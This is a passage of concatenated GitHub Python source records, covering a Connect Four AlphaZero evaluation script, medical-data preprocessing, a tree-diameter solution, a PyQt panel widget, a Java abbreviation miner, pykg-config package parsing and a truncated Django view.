save_twoclasses_npz()\n\n###############################################################################\n# Test loadgin functions\n\n\ndef test_loading():\n from keras_util import load_compressed_files\n\n cielab, se = load_compressed_files('../data/npz-tiny-imagenet/train/n01641577_0_intput_output.npz')\n\n print('Cielab', cielab.shape)\n print('Soft encoding', se.shape)\n\n cielab = image_util.convert_lab_to_rgb(cielab)\n image_util.plot_image(cielab)\n\n\n################################################################################\n# Create pickled files for used by DataGenerator when this file is run directly\n\nif __name__ == '__main__':\n # create_twoclasses_dataset()\n create_all_tf_records()","repo_name":"nikvaessen/recolor-tiny-imagenet","sub_path":"recolor/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":20181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38018553887","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 28 17:40:59 2023\r\n\r\nThis script makes two Connect 4 agents play against each other for k games. \r\nThe relevant statistics are then printed\r\n\r\n@author: Ninniri Matteo. Student ID: 543873\r\n\"\"\"\r\n\r\nfrom Board import ConnectFourBoard\r\nfrom AlphaZeroAgent import AlphaZeroAgent\r\nfrom Net import Net\r\nfrom Game import Game\r\nimport torch\r\n\r\n\r\n\r\nnn1 = Net(x_sz = 6,\r\n y_sz = 7,\r\n n_ch = 2,\r\n k_sz = 3,\r\n n_resnet = 8,\r\n common_ch = 128,\r\n p_ch = 128,\r\n n_moves = 7)\r\nnn1.LoadModel('Connect4_final.pth')\r\n\r\nnn2 = Net(x_sz = 6,\r\n y_sz = 7,\r\n n_ch = 2,\r\n k_sz = 3,\r\n n_resnet = 8,\r\n common_ch = 128,\r\n p_ch = 128,\r\n n_moves = 7)\r\nnn2.LoadModel('Connect4_midpoint.pth')\r\n\r\nk = 10\r\nwon_as_player1 = 0\r\ndrawn_as_player1 = 0\r\nlost_as_player1 = 0\r\nwon_as_player2 = 0\r\ndrawn_as_player2 = 0\r\nlost_as_player2 = 0\r\nfor i in range(k):\r\n torch.manual_seed(i)\r\n \r\n agent1 = AlphaZeroAgent(nn1, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n agent2 = AlphaZeroAgent(nn2, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n b = ConnectFourBoard()\r\n g = Game()\r\n result = g.Play(b, agent1, agent2, verbose = 0)\r\n \r\n if(result == 0):\r\n drawn_as_player1 += 1\r\n elif(result == 1):\r\n won_as_player1 += 1\r\n else:\r\n lost_as_player1 += 1\r\n \r\n ###########################################################################\r\n agent1 = AlphaZeroAgent(nn1, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n agent2 = AlphaZeroAgent(nn2, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n b = ConnectFourBoard()\r\n g = Game()\r\n result = g.Play(b, agent2, agent1, verbose = 0)\r\n \r\n if(result == 0):\r\n drawn_as_player2 += 1\r\n elif(result == -1):\r\n won_as_player2 += 1\r\n else:\r\n lost_as_player2 += 1\r\n \r\n print(\"Iteration\", (i+1))\r\n print(\"Percentage of games agent 1 won AS PLAYER 1:\", \r\n won_as_player1/(i+1), \", drawn =\", drawn_as_player1/(i+1), \", lost =\", lost_as_player1/(i+1))\r\n print(\"Percentage of games agent 1 won AS PLAYER 2:\", \r\n won_as_player2/(i+1), \", drawn =\", drawn_as_player2/(i+1), \", lost =\", lost_as_player2/(i+1))\r\n print(\"======================================================================\")\r\n \r\nprint(\"======================================================================\")\r\nprint(\"Final score:\") \r\nprint(\"Percentage of games agent 1 won AS PLAYER 1:\", \r\n won_as_player1/k, \", drawn =\", drawn_as_player1/k, \", lost =\", lost_as_player1/k)\r\nprint(\"Percentage of games agent 1 won AS PLAYER 2:\", \r\n won_as_player2/k, \", drawn =\", drawn_as_player2/k, \", lost =\", lost_as_player2/k)","repo_name":"Asduffo/AlphaZeroUni","sub_path":"PitConnect4Agents.py","file_name":"PitConnect4Agents.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36883131792","text":"import os\nimport pandas as pd\nimport numpy as np\nimport yaml\nfrom get_data import read_params, get_data\nfrom sklearn.impute import KNNImputer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.utils import resample\nfrom sklearn.utils import shuffle\nfrom imblearn.over_sampling import SMOTENC, RandomOverSampler, KMeansSMOTE\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n\ndef check_missing_val(df, config_path):\n config = read_params(config_path)\n null_data_path = config['data_source']['null_dir']\n val = []\n col_ = []\n for column in df.columns:\n count = df[column][df[column]==\"?\"].count()\n if count > 0:\n val.append(count)\n col_.append(column)\n data = {} \n for key in col_:\n for value in val:\n data[key]=value\n val.remove(value)\n break\n null = pd.DataFrame(data, index= range(0,1))\n if null.shape[1]>0:\n null.to_csv(null_data_path, sep=\",\", index=False)\n\n\n \n\ndef ColsToDrop(df, cols):\n df.drop(columns=cols, axis=1, inplace=True)\n return df\n \n\ndef replaceMissingValWithNAN(df):\n for col in df.columns:\n count = df[col].loc[df[col]=='?'].count()\n if count > 0:\n df[col] = df[col].replace(\"?\", np.nan)\n return df\n\ndef MapCategoricalVal(df):\n for col in df.columns:\n if ((df[col].value_counts()).shape)[0] ==2:\n if 'M' in (df[col].unique()):\n df[col] = df[col].map({'F':0, 'M':1})\n else:\n df[col] = df[col].map({'f':0, 't':1})\n return df\n\n\ndef MissingValImputer(df):\n imputer = KNNImputer(n_neighbors=3, weights=\"uniform\", missing_values=np.nan)\n\n new_array = imputer.fit_transform(df)\n\n df = pd.DataFrame(data=np.round(new_array), columns=df.columns)\n \n return df\n \ndef smoteImbalanceAndSplit(df, config_path):\n config = read_params(config_path)\n bal_data_path = config['data_source']['balanced_sampled_data']\n good_data_path = config['load_data']['good_data_csv']\n\n X = df.drop('Class', axis=1)\n y= df['Class']\n\n ros = RandomOverSampler()\n x_sampled, y_sampled = ros.fit_resample(X,y)\n\n (y_sampled.value_counts()).to_csv(bal_data_path, sep=\",\")\n\n processed_data = pd.concat([x_sampled, y_sampled], axis=1, sort=False)\n\n\n processed_data = shuffle(processed_data).reset_index(drop=True)\n\n processed_data.to_csv(good_data_path, sep=\",\", index=False)\n\n\n\n return processed_data\n \n \n\n","repo_name":"Gntlgenius/Thyroid_detection","sub_path":"src/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25872601331","text":"def dfs(ind):\n global N,result\n visited = [True]*(N+1)\n stack = [(ind,0)]\n while stack:\n cu_ind,distance = stack.pop()\n if not visited[cu_ind]:\n continue\n visited[cu_ind] = False\n if distance > result:\n result = distance\n for next_ind in graph[cu_ind]:\n if visited[next_ind]:\n stack.append((next_ind,distance+graph[cu_ind][next_ind]))\n\nN = int(input())\ngraph = [{} for _ in range(N+1)]\nparents = [0]*(N+1)\nfor _ in range(N-1):\n A,B,C = map(int,input().split())\n graph[A][B] = C\n graph[B][A] = C\n parents[A] += 1\n\nleef_nodes = []\n\nfor ind in range(1,N+1):\n if not parents[ind]:\n leef_nodes.append(ind)\n\nresult = 0\n\nfor ind in leef_nodes:\n dfs(ind)\nprint(result)","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/1967_트리의_지름_version1(Fail).py","file_name":"1967_트리의_지름_version1(Fail).py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32182574674","text":"from PyQt6.QtGui import *\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtWidgets import QWidget, QSizePolicy, QLabel, QPushButton, QGridLayout, QVBoxLayout, QHBoxLayout, QCheckBox, QSpacerItem, QTabWidget\nfrom .mylineedit import MyLineEdit\n\nfrom misc import setup_size_policy\nimport random\n\n\nclass DataPanel(QTabWidget):\n\n def _QLabel(self, text, **kwargs):\n name = \"qlabel_\" + \"\".join([random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(10)])\n qlabel = QLabel(text, **kwargs)\n setattr(self, name, qlabel)\n\n return qlabel\n\n def initialize(self, matrices):\n\n for i in range(self.i):\n self.removeTab(0)\n\n self.i = 0\n\n for i, m in enumerate(matrices):\n self.addTab(self.create_panels(m, i), m.get_filename())\n\n def set_range(self, index, x0=None, x1=None, y0=None, y1=None):\n assert type(index) is int\n\n if y0 is not None:\n getattr(self, f'txb_t0{index}').setText(f'{y0:.4g}')\n if y1 is not None:\n getattr(self, f'txb_t1{index}').setText(f'{y1:.4g}')\n if x0 is not None:\n getattr(self, f'txb_w0{index}').setText(f'{x0:.4g}')\n if x1 is not None:\n getattr(self, f'txb_w1{index}').setText(f'{x1:.4g}')\n\n def create_panels(self, matrix, index):\n\n main_widget = QWidget()\n main_layout = QVBoxLayout()\n main_widget.setLayout(main_layout)\n\n grid = QGridLayout()\n main_layout.addLayout(grid)\n\n grid.addWidget(self._QLabel(\"Matrix size:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(self._QLabel(\"Cropped matrix size:\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n\n lbl_matrix_size = QLabel(f\"{matrix.D.shape[0]} x {matrix.D.shape[1]}\")\n lbl_cr_matrix_size = QLabel(f\"{matrix.D.shape[0]} x {matrix.D.shape[1]}\")\n lbl_visible_area_msize = QLabel(\"\")\n\n grid.addWidget(lbl_matrix_size, 0, 1, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(lbl_cr_matrix_size, 1, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(self._QLabel(\"Visible area:\"), 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(lbl_visible_area_msize, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n txb_t0 = MyLineEdit()\n txb_t1 = MyLineEdit()\n txb_w0 = MyLineEdit()\n txb_w1 = MyLineEdit()\n\n grid.addWidget(self._QLabel(\"y0\"), 3, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(self._QLabel(\"y1\"), 3, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(txb_t0, 4, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(txb_t1, 4, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(self._QLabel(\"x0\"), 5, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(self._QLabel(\"x1\"), 5, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(txb_w0, 6, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(txb_w1, 6, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n # # self.btn_crop_matrix = QPushButton(\"Crop to visible area\")\n # # self.btn_restore_matrix = QPushButton(\"Restore original matrix\")\n #\n # hlayout_crop = QHBoxLayout()\n # # hlayout_crop.addWidget(self.btn_crop_matrix)\n # # hlayout_crop.addWidget(self.btn_restore_matrix)\n # self.main_layout.addLayout(hlayout_crop)\n #\n # # self.btn_crop_matrix.clicked.connect(self.btn_crop_matrix_clicked)\n # # self.btn_restore_matrix.clicked.connect(self.btn_restore_matrix_clicked)\n\n txb_n_spectra = MyLineEdit()\n btn_redraw_spectra = QPushButton(\"Redraw\")\n\n hlayout = QHBoxLayout()\n hlayout.addWidget(self._QLabel(\"Number of spectra shown:\"))\n hlayout.addWidget(txb_n_spectra)\n hlayout.addWidget(btn_redraw_spectra)\n main_layout.addLayout(hlayout)\n\n cb_SVD_filter = QCheckBox(\"SVD filter:\")\n txb_SVD_filter = MyLineEdit()\n\n hlayout2 = QHBoxLayout()\n hlayout2.addWidget(cb_SVD_filter)\n hlayout2.addWidget(txb_SVD_filter)\n main_layout.addLayout(hlayout2)\n\n cb_ICA_filter = QCheckBox(\"ICA subtract filter:\")\n txb_ICA_filter = MyLineEdit()\n\n hlayout3 = QHBoxLayout()\n hlayout3.addWidget(cb_ICA_filter)\n hlayout3.addWidget(txb_ICA_filter)\n main_layout.addLayout(hlayout3)\n\n grid2 = QGridLayout()\n main_layout.addLayout(grid2)\n\n grid2.addWidget(self._QLabel(\"Heat map levels:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n\n txb_z0 = MyLineEdit()\n txb_z1 = MyLineEdit()\n\n grid2.addWidget(self._QLabel(\"z0\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid2.addWidget(self._QLabel(\"z1\"), 1, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid2.addWidget(txb_z0, 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid2.addWidget(txb_z1, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n # self.btn_center_levels = QPushButton(\"Center levels\")\n # self.main_layout.addWidget(self.btn_center_levels)\n\n cb_show_chirp_points = QCheckBox(\"Show chirp points\")\n btn_fit_chirp_params = QPushButton(\"Fit chirp params\")\n\n scp_name = f\"cb_show_cp_{index}\"\n fcp_name = f\"btn_fit_cp_{index}\"\n\n setattr(self, scp_name, cb_show_chirp_points)\n setattr(self, fcp_name, btn_fit_chirp_params)\n\n main_layout.addWidget(self._QLabel(\"For femto fitting:\"))\n\n hlayout2 = QHBoxLayout()\n hlayout2.addWidget(cb_show_chirp_points)\n hlayout2.addWidget(btn_fit_chirp_params)\n main_layout.addLayout(hlayout2)\n\n spacerItem = QSpacerItem(20, 40, QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Expanding)\n main_layout.addItem(spacerItem)\n\n for key, attr in locals().items():\n if key == 'self' or key == 'matrix':\n continue\n\n setattr(self, f'{key}{self.i}', attr)\n\n self.i += 1\n return main_widget\n\n def __init__(self, parent=None):\n super(DataPanel, self).__init__(parent=parent)\n\n self.i = 0 # index of added attributes\n\n # self.main_layout = QVBoxLayout()\n # self.main_layout.addWidget(self.tab_widget)\n #\n # self.setLayout(self.main_layout)\n\n # self.grid = QGridLayout()\n # self.main_layout.addLayout(self.grid)\n #\n # self.grid.addWidget(self._QLabel(\"Matrix size:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self._QLabel(\"Cropped matrix size:\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.lbl_matrix_size = QLabel(\"\")\n # self.lbl_cr_matrix_size = QLabel(\"\")\n # self.lbl_visible_area_msize = QLabel(\"\")\n #\n # self.grid.addWidget(self.lbl_matrix_size, 0, 1, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.lbl_cr_matrix_size, 1, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self._QLabel(\"Visible area:\"), 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.lbl_visible_area_msize, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.txb_t0 = MyLineEdit()\n # self.txb_t1 = MyLineEdit()\n # self.txb_w0 = MyLineEdit()\n # self.txb_w1 = MyLineEdit()\n #\n # self.grid.addWidget(self._QLabel(\"y0\"), 3, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self._QLabel(\"y1\"), 3, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self.txb_t0, 4, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.txb_t1, 4, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self._QLabel(\"x0\"), 5, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self._QLabel(\"x1\"), 5, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self.txb_w0, 6, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.txb_w1, 6, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # # self.btn_crop_matrix = QPushButton(\"Crop to visible area\")\n # # self.btn_restore_matrix = QPushButton(\"Restore original matrix\")\n #\n # hlayout_crop = QHBoxLayout()\n # # hlayout_crop.addWidget(self.btn_crop_matrix)\n # # hlayout_crop.addWidget(self.btn_restore_matrix)\n # self.main_layout.addLayout(hlayout_crop)\n #\n # # self.btn_crop_matrix.clicked.connect(self.btn_crop_matrix_clicked)\n # # self.btn_restore_matrix.clicked.connect(self.btn_restore_matrix_clicked)\n #\n # self.txb_n_spectra = MyLineEdit()\n # self.btn_redraw_spectra = QPushButton(\"Redraw\")\n #\n # hlayout = QHBoxLayout()\n # hlayout.addWidget(self._QLabel(\"Number of spectra shown:\"))\n # hlayout.addWidget(self.txb_n_spectra)\n # hlayout.addWidget(self.btn_redraw_spectra)\n # self.main_layout.addLayout(hlayout)\n #\n # self.cb_SVD_filter = QCheckBox(\"SVD filter:\")\n # self.txb_SVD_filter = MyLineEdit()\n #\n # hlayout2 = QHBoxLayout()\n # hlayout2.addWidget(self.cb_SVD_filter)\n # hlayout2.addWidget(self.txb_SVD_filter)\n # self.main_layout.addLayout(hlayout2)\n #\n # self.cb_ICA_filter = QCheckBox(\"ICA subtract filter:\")\n # self.txb_ICA_filter = MyLineEdit()\n #\n # hlayout3 = QHBoxLayout()\n # hlayout3.addWidget(self.cb_ICA_filter)\n # hlayout3.addWidget(self.txb_ICA_filter)\n # self.main_layout.addLayout(hlayout3)\n #\n # self.grid2 = QGridLayout()\n # self.main_layout.addLayout(self.grid2)\n #\n # self.grid2.addWidget(self._QLabel(\"Heat map levels:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.txb_z0 = MyLineEdit()\n # self.txb_z1 = MyLineEdit()\n #\n # self.grid2.addWidget(self._QLabel(\"z0\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid2.addWidget(self._QLabel(\"z1\"), 1, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid2.addWidget(self.txb_z0, 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid2.addWidget(self.txb_z1, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # # self.btn_center_levels = QPushButton(\"Center levels\")\n # # self.main_layout.addWidget(self.btn_center_levels)\n #\n # self.cb_show_chirp_points = QCheckBox(\"Show chirp points\")\n # self.btn_fit_chirp_params = QPushButton(\"Fit chirp params\")\n #\n # self.main_layout.addWidget(self._QLabel(\"For femto fitting:\"))\n #\n # hlayout2 = QHBoxLayout()\n # hlayout2.addWidget(self.cb_show_chirp_points)\n # hlayout2.addWidget(self.btn_fit_chirp_params)\n # self.main_layout.addLayout(hlayout2)\n #\n # spacerItem = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n # self.main_layout.addItem(spacerItem)\n\n setup_size_policy(self)\n\n # self.main_layout.addStretch(1)\n\n def btn_crop_matrix_clicked(self):\n pass\n\n def btn_restore_matrix_clicked(self):\n pass\n","repo_name":"dmadea/Transient-Spectra-Analyzer","sub_path":"Widgets/datapanel.py","file_name":"datapanel.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"19128873545","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport itertools\n\nimport sys\n\nfrom javalang.tokenizer import Identifier, tokenize\nfrom ..utils.pair_checker import PairChecker\nfrom ..utils.code_cleaner import CodeCleaner\nfrom ..utils.delimiter import Delimiter\nfrom .abbr_base import AbbrBase\n\nfrom javalang.parse import parse\nfrom javalang.tree import VariableDeclaration, FieldDeclaration, MethodInvocation\n\n# from nltk.corpus import words\n\n\n# modify the default recursion limit set by python\nsys.setrecursionlimit(10 ** 6)\n\n\nclass AbbrMiner:\n def __init__(self):\n self.pair_checker = PairChecker.get_inst()\n # self.english_vocab = set(w.lower() for w in words.words())\n\n def process_code(self, code):\n identifiers = self.tokenize_code_based_on_ast(code)\n print('*' * 10 + 'split identifiers info' + '*' * 10)\n print(identifiers)\n pairs = set()\n for term1, term2 in itertools.combinations(identifiers, 2):\n long_term, short_term = (term1, term2) if len(term1) >= len(term2) else (term2, term1)\n if self.pair_checker.check_abbr(short_term, long_term) \\\n and not self.pair_checker.check_collocation(short_term, long_term):\n pairs.add((short_term, long_term))\n return pairs\n\n def mine(self, codes, i) -> AbbrBase:\n abbr_base = AbbrBase()\n count = 0\n for code in codes:\n count += 1\n if count % 500 is 0:\n print('[%d]finished %d codes...' % (i, count))\n try:\n pairs = self.process_code(code)\n for pair in pairs:\n abbr_base.add_pair(abbr=pair[0], full=pair[1])\n except Exception:\n print('[%d]process code %d error' % (i, count))\n return abbr_base\n\n def tokenize_code(self, code) -> set:\n identifiers = set()\n tokens = tokenize(code)\n tokens = CodeCleaner.clean_annotation(list(tokens))\n for token in tokens:\n if isinstance(token, Identifier):\n for split_value in Delimiter.split_camel_strict(token.value).split():\n identifiers.add(split_value)\n return identifiers\n\n def tokenize_code_based_on_ast(self, code) -> set:\n identifiers = set()\n tokens = set()\n node_types = (VariableDeclaration, FieldDeclaration, MethodInvocation)\n cu = parse(code)\n for path, node in cu:\n if isinstance(node, node_types):\n for token in node.tokens():\n if isinstance(token, Identifier):\n tokens.add(token.value)\n for split_value in Delimiter.split_camel_strict(token.value).split():\n identifiers.add(split_value)\n print('*'*10 + 'identifiers info' + '*'*10)\n print(tokens)\n return identifiers\n","repo_name":"TerryMXJ/Abbr_Pair","sub_path":"semantictagging/miner/abbr_miner.py","file_name":"abbr_miner.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71588118225","text":"__version__ = \"$Revision: $\"\n# $Source$\n\nfrom copy import deepcopy\nfrom os.path import abspath, dirname, join, normpath\nimport re\nimport shlex\nimport sys\n\nfrom pykg_config.errorprinter import ErrorPrinter\nfrom pykg_config.exceptions import ParseError\nfrom pykg_config.pcfile import read_pc_file\nfrom pykg_config.substitute import substitute\nfrom pykg_config.props import *\nfrom pykg_config.options import Options\nfrom pykg_config.packagespeclist import parse_package_spec_list\nfrom pykg_config.version import BadVersionFormatError, Version\n\n##############################################################################\n# Package class\n\nclass Package:\n \"\"\"This class stores the information gleaned from a pkg-config\n file, allowing quick access to it.\n\n \"\"\"\n\n def __init__(self, filename=None, globals={}):\n # Different platforms may use different flags and extensions\n if sys.platform == 'win32' and Options().get_option('use_msvc_syntax'):\n self.lib_suffix = '.lib'\n else:\n self.lib_suffix = ''\n\n # Parse a file if one was given\n if filename is not None:\n self.load_from_pc_file(filename, globals)\n if filename.endswith('-uninstalled'):\n self.uninstalled = True\n else:\n self.uninstalled = False\n else:\n self.clear()\n\n def __str__(self):\n result = self.filename + '\\nProperties:\\n'\n for key in self.properties:\n if key == 'requires' or key == 'requires.private' or \\\n key == 'conflicts':\n result += '%s:\\t%s\\n' % \\\n (key, [str(a) for a in self.properties[key]])\n else:\n result += '%s:\\t%s\\n' % (key, self.properties[key])\n result += 'Variables:\\n'\n for key in self.variables:\n result += '%s:\\t%s\\n' % (key, self.variables[key])\n return result\n\n @property\n def variables(self):\n \"\"\"Variables used by the package properties.\"\"\"\n return self._vars\n\n @variables.setter\n def variables(self, new_vars):\n self._vars = new_vars\n\n @property\n def properties(self):\n \"\"\"Properties of the package.\"\"\"\n return self._props\n\n @properties.setter\n def properties(self, new_props):\n self._props = new_props\n\n @property\n def filename(self):\n \"\"\"File name of the pkg-config file this package was loaded from.\"\"\"\n return self._filename\n\n def clear(self):\n \"\"\"Clear all package data.\"\"\"\n self._props = deepcopy(empty_processed_props)\n self._vars = {}\n self.raw_props = deepcopy(empty_raw_props)\n self.raw_vars = {}\n self.filename = ''\n\n def get_raw_property(self, prop):\n \"\"\"Get a property value in its raw format, as it appears in the\n file.\n\n \"\"\"\n return self.raw_props[prop]\n\n def get_raw_variable(self, var):\n \"\"\"Get a variable in its raw format, as it appears in the file.\"\"\"\n return self.raw_vars[var]\n\n def sanity_check(self):\n return True\n\n def load_from_pc_file(self, filename, global_variables):\n \"\"\"Load data from a package config file and process it.\"\"\"\n self.raw_vars, self.variables, \\\n self.raw_props = read_pc_file(filename, global_variables)\n self._filename = filename\n self._process_props(global_variables)\n\n def _process_props(self, global_variables):\n # Processing of file data\n props = self.raw_props\n\n # May need to reset the prefix variable\n if sys.platform == 'win32' and \\\n not Options().get_option('dont_define_prefix'):\n # Use the location of the .pc file to guess a suitable value for\n # the prefix variable. Start by checking if the absolute .pc \n # location ends with '\\lib\\pkgconfig'.\n abs_loc = dirname(abspath(self.filename))\n if Options().get_option('normalise_paths'):\n abs_loc = normpath(abs_loc)\n else:\n # If not normalising paths, then all paths should be in /\n # format for consistency\n abs_loc = abs_loc.replace('\\\\', '/')\n if abs_loc.endswith('\\\\lib\\\\pkgconfig'):\n self.variables[Options().get_option('prefix_variable')] = \\\n abs_loc.rstrip('\\\\lib\\\\pkgconfig')\n ErrorPrinter().debug_print('Replaced {0} with \\\n{1}'.format(Options().get_option('prefix_variable'),\n self.variables[Options().get_option('prefix_variable')]))\n\n # Perform substitutions\n for key in props:\n props[key] = substitute(props[key], self.variables,\n global_variables)\n\n # Parse the data\n self.properties = deepcopy(empty_processed_props)\n self.properties['name'] = props['name']\n if props['description']:\n self.properties['description'] = props['description']\n if props['version']:\n try:\n self.properties['version'] = Version(props['version'])\n except BadVersionFormatError as e:\n raise BadVersionFormatError(e.versionstring, props['name'])\n self.properties['requires'] = \\\n parse_package_spec_list(props['requires'])\n self.properties['requires.private'] = \\\n parse_package_spec_list(props['requires.private']) + \\\n self.properties['requires']\n self.properties['conflicts'] = \\\n parse_package_spec_list(props['conflicts'])\n self._parse_cflags(props['cflags'], global_variables)\n self._parse_libs(props['libs'], global_variables)\n self._parse_libs(props['libs.private'], global_variables, dest='private.')\n\n def _parse_cflags(self, value, global_variables):\n flags = shlex.split(value, posix=False)\n for flag in flags:\n if flag.startswith('-I'):\n if flag[2:] not in \\\n Options().get_option('forbidden_cflags'):\n # Prepend pc_sysrootdir if necessary\n pc_sysrootdir = global_variables.get('pc_sysrootdir', None)\n if pc_sysrootdir:\n # Strip the leading slashes from the flag path\n # because os.path.join() will ignore\n # pc_sysrootdir if it thinks the flag is an\n # absolute path\n include_dir = join(pc_sysrootdir,\n flag[2:].strip().lstrip('/'))\n else:\n include_dir = flag[2:].strip()\n if Options().get_option('full_compatibility') and \\\n include_dir:\n # Drop everything after the first space when trying\n # to be fully compatible (sucky behaviour on Win32).\n include_dir = include_dir.split()[0]\n if sys.platform == 'win32':\n if Options().get_option('normalise_paths'):\n include_dir = normpath(include_dir)\n else:\n include_dir = include_dir.replace('\\\\', '/')\n self.properties['include_dirs'].append(include_dir)\n else:\n self.properties['other_cflags'].append(flag.strip())\n\n\n def _parse_libs(self, value, global_variables, dest=''):\n # Parse lib flags\n libs = shlex.split(value)\n skip_next = False\n for ii, lib in enumerate(libs):\n if skip_next:\n # Possibly skip an entry that was eaten by a -framework\n skip_next = False\n continue\n if lib.startswith('-l'):\n self.properties[dest + 'libs'].append(lib[2:].strip() + \\\n self.lib_suffix)\n elif lib.startswith('-L'):\n if lib[2:] not in \\\n Options().get_option('forbidden_libdirs'):\n # Prepend pc_sysrootdir if necessary\n pc_sysrootdir = global_variables.get('pc_sysrootdir', None)\n if pc_sysrootdir:\n # Strip the leading slashes from the flag path\n # because os.path.join() will ignore\n # pc_sysrootdir if it thinks the flag is an\n # absolute path\n libpath = join(pc_sysrootdir,\n lib[2:].strip().lstrip('/'))\n else:\n libpath = lib[2:].strip()\n if Options().get_option('full_compatibility'):\n # Drop everything after the first space when trying\n # to be fully compatible (sucky behaviour on Win32).\n libpath = libpath.split()[0]\n if sys.platform == 'win32':\n if Options().get_option('normalise_paths'):\n libpath = normpath(libpath)\n else:\n libpath = libpath.replace('\\\\', '/')\n self.properties[dest + 'libpaths'].append(libpath)\n elif lib.startswith('-framework'):\n self.properties[dest + 'otherlibs']. \\\n append(libs[ii + 1].strip() + self.lib_suffix)\n skip_next = True\n else:\n self.properties[dest + 'otherlibs'].append(lib.strip() + \\\n self.lib_suffix)\n\n\n# vim: tw=79\n\n","repo_name":"gbiggs/pykg-config","sub_path":"pykg_config/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"30614904691","text":"# from django.shortcuts import render\nfrom django.views.generic.edit import FormView\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .forms import ScapeForm\nfrom .models import ScapePlayer\nimport time\n# from datetime import datetime, timedelta\n# from django.http import HttpResponse\n\n\nclass ScapeView(FormView):\n template_name = 'scape/scape.html'\n form_class = ScapeForm\n # choices = [(x[0], str(x[1]) + \" days\") for x in settings.DONATION_AMOUNTS]\n\n def get_context_data(self, **kwargs):\n context = super(ScapeView, self).get_context_data(**kwargs)\n context['steam'] = self._get_steam()\n context['current_players'] = self._get_current_players()\n # if self.request.user.is_authenticated():\n # try:\n # all_donations = PremiumDonation.objects.filter(user=self.request.user)\n # if len(all_donations):\n # context['donation'] = all_donations.reverse()[0]\n # else:\n # context['donation'] = PremiumDonation.objects.get(user=self.request.user)\n # if context['donation'].end_time > timezone.now():\n # context['donation_ended'] = False\n # else:\n # context['donation_ended'] = True\n # except PremiumDonation.DoesNotExist:\n # context['donation'] = None\n # else:\n # context['donation'] = None\n return context\n\n def _get_steam(self):\n if self.request.user.is_authenticated():\n try:\n u = 